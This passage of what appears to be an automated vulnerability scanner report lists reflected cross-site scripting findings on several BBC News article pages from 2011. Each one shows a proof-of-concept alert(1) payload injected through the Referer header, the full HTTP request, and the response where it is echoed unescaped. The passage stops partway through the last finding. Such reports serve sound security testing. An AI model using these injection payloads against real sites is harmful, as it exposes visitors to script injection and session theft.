1.63. http://www.bbc.co.uk/news/business-12437194 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1159'-alert(1)-'ddc4023677b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f1159'-alert(1)-'ddc4023677b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad85254ecaa59cab39b1a9718b7c44bd1593170020e17a049b3a453b313c1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad85254ecaa59cab39b1a9718b7c44bd1593170020e17a049b3a453b313c1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=f1159'-alert(1)-'ddc4023677b',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437194',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.64. http://www.bbc.co.uk/news/education-12429152 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf33b'-alert(1)-'b67915982bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cf33b'-alert(1)-'b67915982bf

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=94edf5c55eaae5bda9352015c1a34de86c086097c030f10f9289609ce6e0c7960Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94edf5c55eaae5bda9352015c1a34de86c086097c030f10f9289609ce6e0c7960Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=cf33b'-alert(1)-'b67915982bf',
       section: 'education',
       sectionPath: '/Education',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429152',
       assetType: 'story',
       uri: '/news/educati
...[SNIP]...

1.65. http://www.bbc.co.uk/news/entertainment-arts-12426999 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb150'-alert(1)-'8c6666b86a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb150'-alert(1)-'8c6666b86a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=04bdb5f5fefa05acba38f81fb1a3ea0f672f862030d081eaa44b7ab5922105440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04bdb5f5fefa05acba38f81fb1a3ea0f672f862030d081eaa44b7ab5922105440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fb150'-alert(1)-'8c6666b86a',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12426999',
       assetType: 'stor
...[SNIP]...

1.66. http://www.bbc.co.uk/news/entertainment-arts-12427905 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a62b'-alert(1)-'2d57314ef7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a62b'-alert(1)-'2d57314ef7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24cd25c59e2ae5ac2af8885d714119391e81b986d070b17a84fb7a2512b1c5b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd25c59e2ae5ac2af8885d714119391e81b986d070b17a84fb7a2512b1c5b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6a62b'-alert(1)-'2d57314ef7',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427905',
       assetType: 'stor
...[SNIP]...

1.67. http://www.bbc.co.uk/news/entertainment-arts-12428196 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1411c'-alert(1)-'c4ddf7bcf5f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1411c'-alert(1)-'c4ddf7bcf5f

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=348d5525fe8a65cd58cd6b01812ee87b2501fb94a0102273377d9ae055b32a0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d5525fe8a65cd58cd6b01812ee87b2501fb94a0102273377d9ae055b32a0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1411c'-alert(1)-'c4ddf7bcf5f',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428196',
       assetType: 'stor
...[SNIP]...

1.68. http://www.bbc.co.uk/news/health-12401970 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67c84'-alert(1)-'f9343208b67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=67c84'-alert(1)-'f9343208b67

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=94ddf565beaa15cd2a08472e61ca10d73865b8abc080a189bb0b92cc8d856fac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ddf565beaa15cd2a08472e61ca10d73865b8abc080a189bb0b92cc8d856fac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=67c84'-alert(1)-'f9343208b67',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12401970',
       assetType: 'story',
       uri: '/news/health-124019
...[SNIP]...

1.69. http://www.bbc.co.uk/news/health-12409700 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4048b'-alert(1)-'9c5111a9e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4048b'-alert(1)-'9c5111a9e23

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=a42dc5e56eba959dab7a67ebf1488c9b818c022110c0a1da64bbcaf4501ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a42dc5e56eba959dab7a67ebf1488c9b818c022110c0a1da64bbcaf4501ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4048b'-alert(1)-'9c5111a9e23',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12409700',
       assetType: 'story',
       uri: '/news/health-124097
...[SNIP]...

1.70. http://www.bbc.co.uk/news/health-12415801 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65f2f'-alert(1)-'256936644b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=65f2f'-alert(1)-'256936644b7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=544df5053e5ae56f0be8ab6ea109ce1310acad12e09031198b4b13bf3b6402ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=544df5053e5ae56f0be8ab6ea109ce1310acad12e09031198b4b13bf3b6402ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=65f2f'-alert(1)-'256936644b7',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12415801',
       assetType: 'story',
       uri: '/news/health-124158
...[SNIP]...

1.71. http://www.bbc.co.uk/news/magazine-12392811 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e128e'-alert(1)-'c9f6d44bf44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e128e'-alert(1)-'c9f6d44bf44

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=74dd1585feeab6c44ae339819147a50973ebdad590e0611a541b4a3627f427480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74dd1585feeab6c44ae339819147a50973ebdad590e0611a541b4a3627f427480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476196000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e128e'-alert(1)-'c9f6d44bf44',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12392811',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.72. http://www.bbc.co.uk/news/magazine-12418046 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50bae'-alert(1)-'d15676da76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50bae'-alert(1)-'d15676da76

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=665
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=c4fdb505beca064d39d8f8d27134f7d5e04e6f249040c1697b7bf31411b4eafe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4fdb505beca064d39d8f8d27134f7d5e04e6f249040c1697b7bf31411b4eafe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=50bae'-alert(1)-'d15676da76',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12418046',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.73. http://www.bbc.co.uk/news/magazine-12428754 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cbf7'-alert(1)-'1db4f3eedab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5cbf7'-alert(1)-'1db4f3eedab

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=698
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=b4fd1525de4a86d1abebe59e91677fc0986d3a0900c031994b4b822d34bfc1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4fd1525de4a86d1abebe59e91677fc0986d3a0900c031994b4b822d34bfc1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
